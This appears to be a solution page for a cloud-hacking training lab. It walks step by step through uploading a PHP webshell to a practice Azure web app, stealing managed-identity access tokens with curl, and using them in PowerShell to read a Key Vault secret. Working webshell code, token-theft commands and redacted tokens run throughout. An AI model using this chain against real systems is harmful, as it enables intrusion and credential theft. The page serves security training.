Breaching Azure Intro
Introduction to Azure
Breaching SolarDrops
Breaching Bogus Bank

BA Lab 03 – Solution

Navigate to the SolarDrops web application at https://solardropsuserfiles.azurewebsites.net/ then scroll to the “Hiring Section” with the upload functionality. Open a notepad, paste the following PHP webshell and save it as cmd.php. Then upload it to the hiring form and click Submit.

<?php

system($_REQUEST['cmd']);

?>
SolarDrops Corporate Website – Upload Functionality

The cmd.php file was uploaded to /uploads/cmd.php. Then navigate to https://solardropsuserfiles.azurewebsites.net/uploads/cmd.php?cmd=id and verify that you have a webshell on the solardropsuserfiles App Service.

Then execute https://solardropsuserfiles.azurewebsites.net/uploads/cmd.php?cmd=env and check for the environment variables IDENTITY_ENDPOINT and IDENTITY_HEADER. If it exists, this means that managed identity is assigned on the App Service.

Webshell Screenshot – Env Command Output

Upload a new PHP file cmd1.php and request access tokens for Azure Management and Azure Graph services as shown below:

<?php

system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');

system('curl "$IDENTITY_ENDPOINT?resource=https://graph.windows.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');

?>

Azure Management API (management.azure.com) serves as a central hub for interacting with and controlling various Azure resources. It provides a set of tools and endpoints for users to efficiently administer, monitor, and manage their Azure infrastructure using interfaces like Azure Portal, Azure PowerShell, and Azure CLI.

Azure Graph API (graph.windows.net) is a powerful API underpinning Microsoft Graph, offering a unified endpoint for accessing data and services within Microsoft 365 and Entra ID. This API facilitates seamless interaction with a range of resources, including users, groups, and applications, across the Microsoft cloud environment, enabling developers and administrators to streamline their access and management tasks.

By accessing https://solardropsuserfiles.azurewebsites.net/uploads/cmd1.php the two tokens will be generated:

Webshell Screenshot – Azure Token Generation Output

Use the access tokens and try to login with the Connect-AzAccount Module. 

Connect-AzAccount is a fundamental cmdlet in the Azure PowerShell module, designed for authenticating and establishing a connection to an Azure account. By providing Azure credentials or utilizing alternative authentication methods like service principals, device code, or managed identities, this cmdlet ensures that the script or session has the necessary permissions to interact with the Azure environment effectively.

$mgmtToken = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyIsImtpvruRh9Fr4DINC[...]ZETZAxfb8ozyDFqQa64AB__zFykc-bte7cit1iXfcl8z6tJ3Rau_PmSiWZ0qQiLBkIkXkONvZ4D8S5_tTdM92ZBnXmiFoXvsuNXpfRvl2R_uWg'
$graph = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyIsImtpZCI6Im[...]AHgW9yp_bOSM_iw97BmvwK4zsvd7XpYVSeG52OKmP_RlkN0XW65eOMGwO51yX7lrpfDUK7ZIvJs0akMFcJwYBDZTNVnqz0_njDymQ9xnf7mghMg1kuxJtso29h2Gg'

Connect-AzAccount -AccessToken $mgmtToken -GraphAccessToken $graph -AccountId 8d8bb307-40ab-4eef-ba08-6b40584cd179

Once logged-in check if you have access to any resource by executing:

Get-AzResource

Output:

Name              : Paul-app-KeyVault
ResourceGroupName : UsersKeyVaultResGroup
ResourceType      : Microsoft.KeyVault/vaults
Location          : westeurope
ResourceId        : /subscriptions/e762621c-0447-4a4f-9e9c-da98c94a5f40/resourceGroups/UsersKeyVaultResGroup/providers/Microsoft.KeyVault/vaults/Paul-app-KeyVault

It seems that we have access to Paul-app-KeyVault. The next step is to try to read secrets from the KeyVault:

Get-AzKeyVault | fl *

Output:

ResourceId        : /subscriptions/e762621c-0447-4a4f-9e9c-da98c94a5f40/resourceGroups/UsersKeyVaultResGroup/providers/Microsoft.KeyVault/vaults/Paul-app-KeyVaul
                    t
VaultName         : Paul-app-KeyVault
ResourceGroupName : UsersKeyVaultResGroup
Location          : westeurope
Tags              : {}
TagsTable         :
Get-AzKeyVaultSecret -VaultName Paul-app-KeyVault

Output:

Get-AzKeyVaultSecret : Operation returned an invalid status code 'Unauthorized'
Code: Unauthorized
Message: AKV10000: Request is missing a Bearer or PoP token.
At line:1 char:1
+ Get-AzKeyVaultSecret -VaultName Paul-app-KeyVault
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : CloseError: (:) [Get-AzKeyVaultSecret], KeyVaultErrorException
    + FullyQualifiedErrorId : Microsoft.Azure.Commands.KeyVault.GetAzureKeyVaultSecret

The error indicates that we don’t have the correct Bearer token to read secrets from the Key Vault.

In order to request a KeyVault access token (vault.azure.net), we need to upload a new cmd2.php file with the following PHP code:

<?php

system('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');

?>

Once again, by accessing https://solardropsuserfiles.azurewebsites.net/uploads/cmd2.php a KeyVault access token will be generated:

Disconnect from AzAccount and connect again using the newly generated Keyvault Token:

Disconnect-AzAccount

Log in again using Connect-AzAccount:

$mgmtToken = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyIsImtpZCIH4vruRh9Fr4DIN[...]CCwzr8h2Vhz8xYx9meNfPFgQelpZETZAxfb8ozyDFqQa64AB__zFykc-bte7cit1iXfcl8z6tJ3Rau_PmSiWZ0qQiLBkIkXkONvZ4D8S5_tTdM92ZBnXmiFoXvsuNXpfRvl2R_uWg'
$graph = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNY5cNRGPAHgW9yp_bOSM_[...]iw97BmvwK4zsvd7XpYVSeG52OKmP_RlkN0XW65eOMGwO51yX7lrpfDUK7ZIvJs0akMFcJwYBDZTNVnqz0_njDymQ9xnf7mghMg1kuxJtso29h2Gg'
$keyvault = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyIsImUHMVa2iOUS16nveU[...]QdMYuL37t2X61BXBcTdx5adpQyCVGqHO9U_6UuuQ2jFKFCqYlMODl0rRI5ubCauRuMGck0f5eXP1Ci11C4DFxlxeR8Ejuu1ZjH1Q'
Connect-AzAccount -AccessToken $mgmtToken -GraphAccessToken $graph -KeyVaultAccessToken $keyvault -AccountId 8d8bb307-40ab-4eef-ba08-6b40584cd179

Once logged-in, try to read secrets using the following commands:

Get-AzKeyVaultSecret -VaultName Paul-app-KeyVault

Output:

Vault Name   : paul-app-keyvault
Name         : paul-localkeys
Version      :
Id           : https://paul-app-keyvault.vault.azure.net:443/secrets/paul-localkeys
Enabled      : True

Retrieve Key Vault Secret command:

Get-AzKeyVaultSecret -VaultName Paul-app-KeyVault -Name paul-localkeys -AsPlainText | fl *

Output:

Username: localpaul, Password Part 2/3: 6va5z IP: 10.0.2.5, Port: 5985

We have successfully found the second part of the password.